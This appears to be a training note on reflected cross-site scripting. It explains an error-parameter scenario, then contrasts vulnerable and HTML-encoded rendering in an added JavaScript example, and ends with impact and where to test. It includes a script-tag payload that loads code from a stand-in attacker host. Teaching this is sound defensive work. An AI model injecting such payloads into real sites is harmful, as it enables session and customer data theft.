Reflected XSS

  • Reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any validation

Example Scenario

  • A website displays an error message when you enter incorrect input. The content of the error message is taken from the error parameter in the query string and built directly into the page source

  • The application doesn't check the contents of the error parameter, which allows the attacker to insert malicious code, for example:

<script src="https://attacker.thm/evil.js"></script>
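The scenario above as an added example (not code from the original page or from any real site): the error parameter is rendered once by plain concatenation and once with HTML encoding. The function names, the /login path and the site.example base URL are assumptions made for illustration.

```javascript
// Added example: hypothetical error-page rendering, names are assumptions.

// Escape the five characters that are significant in HTML text and
// in quoted attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Read the `error` query parameter from a request URL.
// site.example is a placeholder base so relative URLs can be parsed.
function errorParam(requestUrl) {
  return new URL(requestUrl, "https://site.example").searchParams.get("error") ?? "";
}

// Vulnerable: the parameter is concatenated into the page source as-is,
// so markup in the query string becomes markup in the page.
function renderVulnerable(requestUrl) {
  return `<div class="error">${errorParam(requestUrl)}</div>`;
}

// Hardened: the parameter is HTML-encoded before it reaches the page,
// so the browser displays it as text instead of parsing it.
function renderHardened(requestUrl) {
  return `<div class="error">${escapeHtml(errorParam(requestUrl))}</div>`;
}

// Constructed request carrying the payload shown above, URL-encoded.
const payload = '<script src="https://attacker.thm/evil.js"></script>';
const sampleUrl = "/login?error=" + encodeURIComponent(payload);

console.log(renderVulnerable(sampleUrl)); // script tag reaches the page
console.log(renderHardened(sampleUrl));   // script tag is inert text
```

This encoding covers the HTML body and quoted attribute contexts only; a value reflected inside a script block or a URL attribute needs the encoding for that context.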

Impact

The attacker could send potential victims links containing a JavaScript payload, or embed such links in an iframe on another website, getting them to execute code in their browser and potentially revealing session or customer information.

How to test Reflected XSS

  • Parameters in the URL Query String

  • URL File Path

  • Sometimes HTTP headers
